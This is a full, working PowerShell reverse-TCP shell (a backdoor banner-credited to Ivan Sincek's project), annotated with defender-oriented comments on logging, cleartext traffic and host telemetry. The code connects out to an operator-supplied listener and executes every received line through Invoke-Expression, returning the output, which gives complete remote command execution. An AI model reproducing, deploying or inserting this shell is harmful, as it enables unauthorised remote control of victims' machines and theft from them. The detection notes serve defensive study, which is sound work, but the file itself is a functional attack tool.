# Interactive reverse-TCP shell: prompts the operator for a listener address/port,
# opens an OUTBOUND TcpClient connection to it, and runs every line received over
# that socket through Invoke-Expression in this PowerShell session.
# Defender notes (all grounded in the code below):
# - The channel is plain TCP -- no SslStream/TLS wrapper appears in this file -- so
#   the "PS>" prompt, the commands and their output cross the network in cleartext
#   and are visible to network inspection.
# - Execution goes through Invoke-Expression, so PowerShell script block logging
#   (Microsoft-Windows-PowerShell/Operational event 4104) records the received
#   command text; constrained language mode, AppLocker or WDAC limit what it can run.
# - Host telemetry: powershell.exe opening an outbound TCP connection to an
#   operator-chosen port, plus the banner strings printed to the console below.
# Listener endpoint is supplied interactively rather than hard-coded; nothing here
# validates its format.
$addr = $(Read-Host -Prompt "Enter address").Trim();
Write-Host "";
# Port is kept as a string; the TcpClient constructor call below relies on
# PowerShell coercing it to an integer.
$port = $(Read-Host -Prompt "Enter port number").Trim();
Write-Host "";
# Only emptiness is checked -- no range or format validation of address or port.
if ($addr.Length -lt 1 -or $port.Length -lt 1) {
Write-Host "Both parameters are required";
} else {
Write-Host "PowerShell Reverse TCP v4.0 by Ivan Sincek.";
Write-Host "GitHub repository at github.com/ivan-sincek/powershell-reverse-tcp.";
# Pre-declared so the finally block can test each handle for $null.
$client = $stream = $buffer = $writer = $data = $result = $null;
try {
# Outbound connect to the operator's listener -- the "reverse" in reverse TCP.
# This is the network event a defender sees: powershell.exe -> $addr:$port.
$client = New-Object Net.Sockets.TcpClient($addr, $port);
$stream = $client.GetStream();
# 1 KiB receive buffer; longer commands are reassembled by the inner loop below.
$buffer = New-Object Byte[] 1024;
# Incoming bytes are decoded as UTF-8; outgoing text is written as UTF-8 with
# AutoFlush so each result is pushed to the socket immediately.
$encoding = New-Object Text.UTF8Encoding;
$writer = New-Object IO.StreamWriter($stream, [Text.Encoding]::UTF8, 1024);
$writer.AutoFlush = $true;
# Banners go to the local console only (Write-Host), never to the socket.
Write-Host "Backdoor is up and running...";
Write-Host "";
$bytes = 0;
# Outer loop: one iteration per command, until the peer closes the connection
# (Read returns 0).
do {
# The prompt itself is sent in cleartext over the socket.
$writer.Write("PS>");
# Inner loop: keep reading while the socket reports more data, so a command split
# across several TCP segments is reassembled before it is executed.
do {
$bytes = $stream.Read($buffer, 0, $buffer.Length); # blocking
if ($bytes -gt 0) {
$data += $encoding.GetString($buffer, 0, $bytes);
}
} while ($stream.DataAvailable);
# If the last Read returned 0, any partially accumulated $data is never executed;
# the outer loop then exits.
if ($bytes -gt 0) {
$data = $data.Trim();
if ($data.Length -gt 0) {
try {
# Whatever arrived is executed verbatim in this session: no authentication, no
# allow-list, no length limit. Script block logging captures this text.
# 2>&1 merges non-terminating errors into the returned output; terminating
# errors fall through to the catch below.
$result = Invoke-Expression -Command $data 2>&1 | Out-String;
} catch {
# Exception text is returned to the peer as the command output.
$result = $_.Exception | Out-String;
}
# $data is dropped after each command and re-created by += on the next read.
Clear-Variable data;
# Only non-empty output is written back to the socket.
if ($result.Length -gt 0) {
$writer.Write($result);
Clear-Variable result;
}
}
}
} while ($bytes -gt 0);
Write-Host "Backdoor will now exit...";
} catch {
# Only InnerException.Message is shown -- presumably because New-Object wraps a
# failed connect's SocketException; an exception with no inner exception prints
# nothing useful here. TODO confirm.
Write-Host $_.Exception.InnerException.Message;
} finally {
# Cleanup: close/dispose in reverse order of creation, then scrub the variables and
# force a GC. The explicit buffer.Clear()/Clear-Variable/[GC]::Collect() sequence
# shortens how long command text lingers in process memory, so a memory capture is
# a less reliable evidence source than script block logging or the network stream.
if ($writer -ne $null) {
$writer.Close(); $writer.Dispose();
Clear-Variable writer;
}
if ($stream -ne $null) {
$stream.Close(); $stream.Dispose();
Clear-Variable stream;
}
if ($client -ne $null) {
$client.Close(); $client.Dispose();
Clear-Variable client;
}
if ($buffer -ne $null) {
$buffer.Clear();
Clear-Variable buffer;
}
if ($result -ne $null) {
Clear-Variable result;
}
if ($data -ne $null) {
Clear-Variable data;
}
[GC]::Collect();
}
}
# The address and port are removed from the session as well once the shell exits.
Clear-Variable addr;
Clear-Variable port;